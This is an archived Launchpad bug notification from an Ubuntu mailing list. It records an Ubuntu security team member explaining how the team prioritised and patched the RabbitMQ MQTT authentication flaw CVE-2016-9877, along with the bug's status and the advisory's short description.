[Bug 1706900] Re: CVE-2016-9877 RabbitMQ authentication vulnerability
Seth Arnold
1706900 at bugs.launchpad.net
Tue Aug 1 02:32:16 UTC 2017
Hi Nils,
Ubuntu's security team does not use upstream assessments of
severity when assigning priorities. Our criteria are enumerated at
http://bazaar.launchpad.net/~ubuntu-security/ubuntu-cve-tracker/master/view/head:/README#L191 .
Upstream estimates of severity are usually focused strictly on the
service at hand while we need to prioritize our work across more than
ten thousand sources. This doesn't mean upstream severities are wrong,
but we must have some way to prioritize our work that's consistent.
The CVE tracker does indeed trigger the process to issuing security
updates. You can see this process at https://usn.ubuntu.com/usn/ where
we have issued 290 USNs so far this year. Less visible is the sponsored
updates to universe packages in collaboration with the community, which
do not get USNs.
We do not have service level agreements for security updates. Even
if such a thing were feasible for our team we believe this would be
counter-productive to overall security as many upstreams issue regression
fixes after security fixes get wider coverage.
Seven months for an issue with an upstream-provided patch is indeed too
long. We have recently hired a new team member; while his duties are
primarily providing extended support for 12.04 LTS to Ubuntu Advantage
customers, he will also perform additional updates and generalist duties
as time allows.
In addition, while it doesn't happen often, we are happy to sponsor
updates for packages in main. It would probably be best to check in with
us before beginning work on a sponsored update to ensure (a) we'd be
interested in the approach (b) that it wouldn't be duplicating work. For
more information see https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures
. This may help bring a specific update to our users more quickly.
Thanks
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to rabbitmq-server in Ubuntu.
https://bugs.launchpad.net/bugs/1706900
Title:
CVE-2016-9877 RabbitMQ authentication vulnerability
Status in RabbitMQ:
Fix Released
Status in rabbitmq-server package in Ubuntu:
Fix Released
Status in rabbitmq-server source package in Trusty:
Fix Released
Status in rabbitmq-server source package in Xenial:
Fix Released
Bug description:
https://pivotal.io/security/cve-2016-9877
"MQTT (MQ Telemetry Transport) connection authentication with a
username/password pair succeeds if an existing username is provided
but the password is omitted from the connection request. Connections
that use TLS with a client-provided certificate are not affected."
Affects RabbitMQ "3.x versions prior to 3.5.8"
Ubuntu's Xenial repos are currently offering 3.5.7-1ubuntu0.16.04.1,
and according to its changelog, Pivotal's fix for CVE-2016-9877 has
not been included.
To manage notifications about this bug go to:
https://bugs.launchpad.net/rabbitmq/+bug/1706900/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list